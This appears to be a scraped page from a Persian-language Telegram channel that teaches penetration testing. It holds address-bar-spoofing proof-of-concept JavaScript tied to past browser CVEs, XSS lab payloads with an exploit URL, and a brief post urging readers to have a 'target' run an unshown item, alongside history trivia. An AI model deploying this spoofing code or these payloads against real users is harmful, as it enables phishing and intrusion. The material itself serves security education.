Try Hack Box – Telegram
Try Hack Box
5.77K subscribers
682 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
Try Hack Box
ADDRESS BAR SPOOFING BUGS طبق گوگل [ https://bughunters.google.com/about/rules/6625378258649088google-and-alphabet-vulnerability-reward-program-vrp-rules ]، نوار آدرس تنها نشانگر امنیتی در مرورگرهای مدرن است که می توان به آن اعتماد کرد. این منطقی به نظر می…
Address Bar Spoofing
- مثال 1

در جاوا اسکریپت، چندین توابع به کاربران این امکان را می دهند که اجرای یک رویداد را به تاخیر بیاندازند یا یک رویداد را در فواصل زمانی منظم اجرا کنند. این روش ها قدرتمند هستند و می توان از آنها برای جستجوی آسیب پذیری های Address Bar Spoofing استفاده کرد. بیایید به نمونه ای از این تکنیک نگاه کنیم:

کد
<noscript>
w = window.open("www.facebook.com", "_blank");
setTimeout(function(){w.document.write("<html>This is
not Facebook</html>")},5000);
</noscript>


این اسکریپت وب سایت فیس بوک را در یک پنجره جدید با استفاده از عملکرد " window.open " باز می کند و سپس سعی می کند صفحه را با متن "This is not Facebook" با استفاده از document.write پس از پنج ثانیه تاخیر بازنویسی کند. اجرا با استفاده از آن به تاخیر می افتد. تابع "setTimeout". در طول این فرآیند، مرورگر ممکن است آدرس بار را به روز نکند، بنابراین در حالی که آدرس بار همچنان به facebook.com اشاره می کند، محتوای نمایش داده شده در واقع توسط مهاجم کنترل می شود. در اینجا نمونه ای از مرورگر Yandex (CVE(2020-7369)) است که آدرس بار را با استفاده از همان تکنیک حفظ می کند.
@TryHackBox
Try Hack Box
Address Bar Spoofing - مثال 1 در جاوا اسکریپت، چندین توابع به کاربران این امکان را می دهند که اجرای یک رویداد را به تاخیر بیاندازند یا یک رویداد را در فواصل زمانی منظم اجرا کنند. این روش ها قدرتمند هستند و می توان از آنها برای جستجوی آسیب پذیری های Address…
Address Bar Spoofing

مثال 2

یکی دیگر از تکنیک‌های راه‌اندازی address bar spoofing، استفاده از یک پورت ناموجود برای حفظ آدرس بار همراه با استفاده از توابع زمان‌بندی جاوا اسکریپت برای ایجاد تاخیرهای مناسب است. بیایید به نمونه ای از این تکنیک نگاه کنیم:

کد

function spoof(){
document.write("<h1>This is not Bing</h1>");


@TryHackBox
Try Hack Box
شکل 1.12 جعل نوار آدرس یا همون آدرس بار مرورگر Yandex. @TryHackBox
document.location = "https://bing.com:1234";
setInterval(function(){document.location="https:// bing.com:1234";},9800);
};


👍1
Try Hack Box
document.location = "https://bing.com:1234"; setInterval(function(){document.location="https:// bing.com:1234";},9800); }; 
این اسکریپت از تابع document.location برای هدایت کاربر به " https://bing.com " در یک پورت غیر استاندارد، "1234" استفاده می کند. بسته به مرورگر، زمانی طول می کشد تا در نهایت خطای توقف اتصال را بازگردانید، زیرا هیچ سرویسی در این پورت اجرا نمی شود. در طول این بازه زمانی، زمانی که مرورگر تلاش می‌کند تا « https://bing.com:1234 » را بارگیری کند، تابع setInterval به طور مکرر فراخوانی می‌شود، که باعث هدایت مجدد به URL می‌شود، بنابراین پروسس در فواصل زمانی مشخص بازیابی می‌شود.

این پروسس URL جعلی را در نوار آدرس حفظ می کند و در عین حال به مهاجمان اجازه می دهد محتوای صفحه وب را تغییر دهند. این پس از هر بازه زمانی مشخص اجرا می شود، بنابراین URL در پروسس حفظ می شود، در حالی که به مهاجمان اجازه می دهد محتوا را در سند بنویسند که منجر به جعل نوار آدرس می شود. در حالت ایده آل، رفتار صحیح برای مرورگر این است که وقتی تابع setInterval برای تغییر مسیر فراخوانی می شود، به "about: blank" تغییر مسیر دهد.

از همان POC برای ایجاد آسیب‌پذیری‌های جعل نوار آدرس در مرورگرهای سافاری چندین بار به همراه سایر مرورگرهای محبوب مانند Microsoft Edge و DuckDuckGo استفاده شده است. جالب اینجاست که مرورگر سافاری پورت را مخفی می‌کند و از این رو تنها URL قابل مشاهده برای کاربر، bing.com است.

@TryHackBox
👍1
Try Hack Box pinned Deleted message
Media is too big
VIEW IN TELEGRAM
ورکشاپ تست نفوذ لایو ازصفر تا صد برروی یک اپلیکیشن اندرویدی واقعی! به تدریس مهندس میثم منصف

@TryHackBox
👍2🔥2
👾 CVE PoC

• قبلاً سرویس های مختلف از نام های متفاوتی برای نشان دادن آسیب پذیری های یکسان استفاده می کردند. برای از بین بردن سردرگمی با نام آسیب‌پذیری‌ها، MITER راه‌حلی را پیشنهاد کرده است که مستقل از فروشندگان مختلف ابزار تشخیص آسیب‌پذیری است. این راه حل به عنوان پایگاه داده آسیب پذیری و قرار گرفتن در معرض مشترک CVE پیاده سازی شد. این راه حل به همه متخصصان و تولید کنندگان اجازه می داد که به یک زبان صحبت کنند. در این پایگاه داده، برای هر آسیب‌پذیری، از ویژگی رکورد زیر استفاده می‌شود: CVE- YYYY-NNNN ، که در آن YYYY سال کشف آسیب‌پذیری است و NNNN شماره سریال آن است.

• اگر سوالی دارید ، "این CVE های شما از کجا می آیند؟" سپس پاسخ این است: بیایید تصور کنیم که آسیب پذیری دیگری پیدا کرده اید و می خواهید در مورد آن به تمام دنیا بگویید. برای انجام این کار، باید فرم خاصی را در وب سایت miter پر کنید. و در واقع این همه چیز است)) https://www.cve.org/ResourcesSupport/FAQs

• اما نکته پست کمی متفاوت است. امروز پیشنهاد می‌کنم یک مخزن بسیار مفید را بررسی کنید، که تقریباً همه CVE‌ها را از سال 1999 شامل می‌شود، مرتب‌سازی راحت (بر اساس سال) وجود دارد و به‌روزرسانی‌های روزانه وجود دارد: https://github.com/trickest/cve . امیدوارم خیلی مفید باشه...
@TryHackBox
1
Media is too big
VIEW IN TELEGRAM
All Labs => Link
This Lab => Link
Payload => '<noscript>alert(1)</noscript>
Exploit => https://0a7e00c904b532ec8094df9100b300cd.web-security-academy.net/?search=%27%3Cnoscript%3Ealert(1)%3C/noscript%3E

@TryHackBox
👍7
Forwarded from Try Hack Box
دوستان کانال یوتیوب بزنیم با اهداف آموزشی از ما حمایت میکنید ؟
Anonymous Poll
81%
بله
19%
خیر ، چرا ؟
💸 مخترع دستگاه خودپرداز در مدت 50 سال 15 دلار از ایده خود به دست آورد.

• سیستم ثبت اختراع به مخترعان بسیاری از چیزهای محبوب اجازه می دهد تا میلیون ها دلار آمریکا به دست آورند. در یکی از کمدی های آمریکایی، لحظه ای پخش شد که در آن یکی از قهرمانان فیلم یک فرد بسیار ثروتمند است، زیرا مادربزرگش فنری برای توستر اختراع کرد و تمام خانواده هنوز از تولید کنندگان توستر حق امتیاز دریافت می کنند.

• اما استثنائاتی وجود دارد. جیمز گودفلو، که اختراع دستگاهی را برای صدور خودکار پول کاغذی برای مشتریان بانک به ثبت رساند، تقریباً هیچ درآمدی نداشت. او 15 دلار گرفت و تمام. اما میلیاردها نفر از دستگاه های خودپرداز و میلیون ها دستگاه خود استفاده می کنند.

• گاردین حتی مصاحبه ای با Goodfellow دارد که در آن مخترع تاریخچه ATM را به اشتراک گذاشته است. مخترع ادعا می کند که مفهوم دستگاه توزیع پول نه تنها به ذهن او خطور کرده است، بلکه این ایده او بود که منجر به ایجاد دستگاه خودپرداز شد. در اینجا او برادران رایت را به یاد می آورد که مفهوم پرواز را خلق نکردند . اما آنها یک نمونه اولیه از یک هواپیما ساختند که می توانست پرواز کند، به همین دلیل است که آنها را خالق هواپیما می دانند.

• گودفلو می‌گوید افراد کمی در مورد حق اختراع او می‌دانند، و او تا سال 2005 که مردی کاملاً متفاوت، جان شپرد-بارون، جایزه را برای اختراع دستگاه خودپرداز برنده شد، به کسی چیزی نگفت. جایزه: نشان امپراتوری بریتانیا. جالب اینجاست که Goodfellow سفارش مشابهی دریافت کرده است، اما نه برای اختراع دستگاه خودپرداز، بلکه برای ایده معرفی کدهای پین برای این دستگاه ها. به هر حال، شپرد-بارون حق ثبت اختراعی برای دستگاهی برای توزیع پول نقد به مشتریان بانک ندارد، اگرچه او دستگاه مشابهی را تقریباً در همان زمان Goodfellow ایجاد کرد.

• سیستم صدور وجه نقد به مشتریان بانک در هر زمان توسط Goodfellow در اواسط دهه 60 ایجاد شد. سپس برای شرکت بزرگ کلوین هیوز کار کرد. وظیفه توسعه سیستم صدور پول پس از پایان روز کاری از مقامات دریافت شد. در نتیجه، مخترع سیستمی را ارائه کرد که می‌توانست پس از شناسایی مشتری، وجوهی را برای مشتری بانک صادر کند. فرآیند شناسایی دو مرحله ای بود - مشتری باید یک کارت پلاستیکی مخصوص با سوراخ های سوراخ شده را در شکاف وارد می کرد (جایگاه آنها برای هر مشتری منحصر به فرد بود)، به علاوه کد پین خود را (10 رقمی) وارد می کرد.

• یک سیستم توزیع پول ایجاد شد و اولین دستگاه از این دست در سال 1967 در یکی از شعبه های بانک وست مینستر نصب شد.

• سیستم مشابهی از نویسندگی برای مخترع دیگر، شپرد-بارو، نیز در سال 1967 نصب شد، یک ماه زودتر از سیستم Goodfellow. با این حال، حق ثبت اختراع متعلق به قهرمان این نشریه است. او درخواست های ثبت اختراع را در دفاتر 15 کشور ثبت کرد. آنالوگ نیز پس از شناسایی مشتری، پول صادر کرد، اما در اینجا از کارت پلاستیکی استفاده نمی شد، بلکه یک چک با ایزوتوپ کربن بود.

• نویسندگی Goodfellow قبلاً توسط دولت به رسمیت شناخته شده است. و در کتاب زندگی در بریتانیا (که باید توسط کسانی که مایل به اخذ تابعیت بریتانیا هستند مطالعه شود)، گودفلو قبلاً به عنوان خالق دستگاه خودپرداز ذکر شده است. به گفته او، این اختراع زندگی او را تغییر نداد. اما گودفلو از همه چیز راضی است.
#تاریخچه
@TryHackBox
👍2
🚀 کپی پیست که مانع پرواز من به فضا شد.

• این داستان در مورد اشتباهی است که می تواند هفت میلیارد دلار هزینه داشته باشد و 10 سال کار طول بکشد. به هر حال، این دقیقاً همان مقداری است که برای توسعه موشک آریان 5 هزینه شده است.

• موشک آریان 5 یک وسیله پرتاب مصرفی اروپایی است. این برای پرتاب فضاپیماهای متوسط ​​یا سنگین به مدار پایین زمین طراحی شده است. حدود هزار شرکت صنعتی در ساخت این موشک شرکت کردند. همه چیز خوب پیش رفت، اما کمتر از 40 ثانیه پس از بلند شدن، موشک منفجر شد. این اتفاق در 4 ژوئن 1996 رخ داد.

• آریان 5 در ارتفاع 4000 متری از مسیر مستقیم منحرف شد و خود ویران شد. در 13 ژوئن 1996، کمیسیون ویژه ایجاد شده برای بررسی سانحه آغاز شد و در 19 جولای گزارش جامع آن به اطلاع عموم رسید.

• به طور خلاصه، خطا از جانب توسعه دهندگان بود. آنها کد را از برنامه کنترل یک مدل موشک قبلی که با موفقیت بیش از صد بار پرواز کرده بود، کپی کردند . با این حال، آنها در نظر نگرفتند که آریان 4 در امتداد یک مسیر متفاوت و با سرعت افقی متفاوت پرواز می کند.

ویدئویی از نتیجه چنین خطایی را می توانید در ویدئو پایین مشاهده کنید.
#تاریخچه
@TryHackBox
👍2
This media is not supported in your browser
VIEW IN TELEGRAM
انفجار پرتاب موشک آریان 5
@TryHackBox
👍2
• انواع حافظه SIMM، DIMM، DDR، DDR2، DDR3.

• انواع رم هایی که در کامپیوترهای شخصی استفاده شده و هستند.
@TryHackBox
⚠️دوستان این رو به هیچ وجه روی سیستم خودتون ران نکنین
بدین به تارگتتون ران کنه و تمام
👍1
White_HQ_Ethical_Hacking_Mindmap.pdf
5.6 MB
ذهن تست نفوذ (کامل)
توسط: علیرضا توکلی
@TryHackBox
Media is too big
VIEW IN TELEGRAM
All Labs => Link
This Lab => Link
Payload => <noscript>alert(1)</noscript>
@TryHackBox